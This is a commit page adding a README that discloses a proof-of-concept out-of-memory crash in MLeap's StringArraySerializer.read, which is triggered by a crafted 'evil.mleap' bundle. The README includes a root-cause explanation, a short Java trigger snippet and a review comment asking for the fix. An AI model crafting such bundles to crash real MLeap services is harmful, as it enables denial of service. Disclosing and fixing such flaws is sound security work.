wulonchia committed on
Commit 2007fbc · verified · 1 Parent(s): 4fc639b

Upload README.md with huggingface_hub

  1. README.md +25 -0
README.md ADDED
@@ -0,0 +1,25 @@
1
+ # MLeap StringArraySerializer OOM PoC
2
+
3
+ Proof-of-concept for an uncontrolled resource consumption vulnerability in MLeap's `StringArraySerializer.read`.
4
+
5
+ ## Files
6
+ - `evil.mleap`: crafted MLeap bundle ZIP. Loading it triggers `OutOfMemoryError` via `new Array[Byte](0x7FFFFFFF)` in `StringArraySerializer.read`.
7
+
8
+ ## Reproduce
9
+ ```python
10
+ import struct, zipfile, io, base64
11
+ from mleap.pyspark.spark_support import SimpleSparkSerializer
12
+ # Or load via BundleFile in Scala/Java:
13
+ # BundleFile.load("evil.mleap")
14
+ ```
15
+
16
+ ## Root Cause
17
+ `StringArraySerializer.read` calls `din.readInt()` on attacker-controlled bytes and passes the result directly to `new Array[Byte](size)` with no bounds check. `OutOfMemoryError` extends `VirtualMachineError`; Scala's `NonFatal` extractor returns false for it, so the surrounding `Try{}` does not catch it — the error propagates and crashes the process.
18
+
19
+ ## Trigger (Java)
20
+ ```java
21
+ DataInputStream din = new DataInputStream(
22
+ new ByteArrayInputStream(new byte[]{0x7F,(byte)0xFF,(byte)0xFF,(byte)0xFF}));
23
+ int size = din.readInt(); // 2147483647
24
+ byte[] bytes = new byte[size]; // OutOfMemoryError: Requested array size exceeds VM limit
25
+ ```
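Review bot: The Python block under "## Reproduce" only imports modules (struct, zipfile, io, base64, SimpleSparkSerializer) and never loads anything, so as written it reproduces nothing; the only load step is the commented-out `BundleFile.load("evil.mleap")`. Either make that the documented step or drop the unused imports. The "## Files" section lists `evil.mleap`, but this commit changes only README.md, so say where the bundle comes from. The README also names no affected MLeap version and no remediation. Since "## Root Cause" attributes the crash to `new Array[Byte](size)` running with no bounds check, add a short section stating the fix: validate the value from `din.readInt()` (reject negatives and anything above a configured maximum or the bytes remaining in the stream) before allocating. It is also worth noting that the "## Trigger (Java)" snippet shows the JVM allocation behaviour in isolation and does not go through MLeap's own code path.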